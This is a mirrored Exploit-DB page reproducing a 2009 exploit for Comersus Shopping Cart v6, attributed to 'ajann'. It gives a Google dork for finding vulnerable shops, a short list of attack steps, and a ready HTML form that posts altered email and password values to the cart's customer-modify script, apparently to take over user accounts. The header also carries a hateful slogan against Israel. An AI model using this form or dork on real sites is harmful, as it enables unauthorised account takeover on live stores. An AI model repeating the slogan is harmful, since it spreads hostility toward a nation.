- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7736
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- N/A
- Дата публикации
- 2009-01-12
HTML:
*******************************************************************************
# Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author : "ajann" from Turkey
# Contact : :(
# S.Page : http://www.comersus.com/
# $$ : Free
# Dork : Powered by Comersus v6 Shopping Cart
# DorkEx :
http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=
KAHROLSUN ISRAEL
-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form
*******************************************************************************
<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
<table width="421" border="0">
<tr>
</tr>
<tr>
<td width="168">Name</td>
<td width="220">
<input type=text name=customerName value="test">
</td>
</tr>
<tr>
<td width="168">Last Name</td>
<td width="220">
<input type=text name=lastName value="test">
</td>
</tr>
<tr>
<td width="168">Company</td>
<td width="220">
<input type=text name=customerCompany value="test">
</td>
</tr>
<tr>
<td width="168">Phone</td>
<td width="220">
<input type=text name=phone value="123456789">
</td>
</tr>
<tr>
<td width="168"><strong>Email</strong></td>
<td width="220">
<input type="text" name="email" value="Please Add Mail">
Edit
</td>
</tr>
<tr>
<td width="168"><strong>Password</strong></td>
<td width="220">
<input type=text name=password value="Please Add Pass">
Edit
</td>
</tr>
<tr>
<td width="168">Address</td>
<td width="220">
<input type=text name=address value="test">
</td>
</tr>
<tr>
<td width="168">Zip</td>
<td width="220">
<input type=text name=zip value="08050">
</td>
</tr>
<tr>
<td width="168">State</td>
<td width="220">
<SELECT name=stateCode size=1>
<OPTION value="">Select the state
<option value="1">Please Type County below
</OPTION>
</SELECT>
</td>
</tr>
<tr>
<td width="168">Non listed state</td>
<td width="220">
<input type=text name=state value="">
</td>
</tr>
<tr>
<td width="168">City</td>
<td width="220">
<input type=text name=city value="test">
</td>
</tr>
<tr>
<td width="168">Country</td>
<td width="220">
<SELECT name=countryCode>
<OPTION value="">Select the country
<option value="AF" selected>AFGHANISTAN
</OPTION>
</SELECT>
</td>
</tr>
<tr>
<td width="168"> </td>
<td width="220"> </td>
</tr>
<tr>
<td colspan="2">
<input type="submit" name="Modify" value="Modify">
</td>
</tr>
</table>
</form>
# milw0rm.com [2009-01-12]
- Источник
- www.exploit-db.com